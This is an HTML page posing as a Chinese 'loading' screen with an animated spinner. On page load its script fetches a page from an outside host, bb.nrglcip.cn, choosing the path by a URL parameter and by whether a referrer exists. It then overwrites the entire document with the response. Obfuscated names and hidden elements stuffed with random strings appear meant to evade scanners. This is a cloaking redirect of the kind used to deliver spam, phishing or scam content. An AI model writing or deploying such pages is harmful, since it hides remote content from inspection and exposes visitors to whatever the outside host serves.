<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Lc1WiU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Lc1WiU .hGA62AS {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Lc1WiU .content {
            line-height: 50px;
            text-align: center
        }

        .Lc1WiU .img {
            width: 100%
        }

        .Lc1WiU .mCXTK3ULm {
            text-align: center
        }

        .Lc1WiU .mCXTK3ULm span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Lc1WiU .mCXTK3ULm span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Lc1WiU .mCXTK3ULm span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Lc1WiU .mCXTK3ULm span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Lc1WiU .mCXTK3ULm span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Lc1WiU .mCXTK3ULm span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Lc1WiU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gowYva6oV9PU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DSBUDnm = gowYva6oV9PU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DSBUDnm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DSBUDnm +".html?a=share";
		}
		
        SeyaEc1on6=url+"#"+new Date().getTime();
        SeyaEc1on6 && function() {
            $.get(SeyaEc1on6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>O6t2xJoHlMhHmLSzWa9dtOto0gHYQ9TGgMdsBv9tr7ipiuUsYdfHjJo8LtNvzkAo6W</span>
<li style='display:none' >fnfmWTcw8bmPXhdmtCVL5B2vgq2bg9eYJoRqSV9WlIt</li>
<ul style='display:none' >THLvpVYyQjAhOQ5LZ2chckvu4tkBgxcbkXzrW3fNJz9JWUaz</ul>
<li style='display:none' >fnfmWTcw8bmPXhdmtCVL5B2vgq2bg9eYJoRqSV9WlIt</li>
<li style='display:none' >fnfmWTcw8bmPXhdmtCVL5B2vgq2bg9eYJoRqSV9WlIt</li><div class="Lc1WiU">
    <div class="hGA62AS">
        <div class="mCXTK3ULm">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>ZGnDXRW3NG0WpaXrCOqDsPKZynwPfAil4PaNEPY7JqSZMqDsSvHT7yub9kx5WMVtI47CZR7z</a>
<span style='display:none'>Mg6uo19bAjR1yCz0KPK7C</span>
<h1 style='display:none' >gpfN8BA9BCxE6PPFeQ69GY8Ovh</h1>
<a  href='#' style='display:none'>ZGnDXRW3NG0WpaXrCOqDsPKZynwPfAil4PaNEPY7JqSZMqDsSvHT7yub9kx5WMVtI47CZR7z</a>
<a  href='#' style='display:none'>ZGnDXRW3NG0WpaXrCOqDsPKZynwPfAil4PaNEPY7JqSZMqDsSvHT7yub9kx5WMVtI47CZR7z</a>
<span style='display:none'>Mg6uo19bAjR1yCz0KPK7C</span>
<a  href='#' style='display:none'>ZGnDXRW3NG0WpaXrCOqDsPKZynwPfAil4PaNEPY7JqSZMqDsSvHT7yub9kx5WMVtI47CZR7z</a>
<span style='display:none'>Mg6uo19bAjR1yCz0KPK7C</span>
<img  src='' style='display:none'></body>
</html>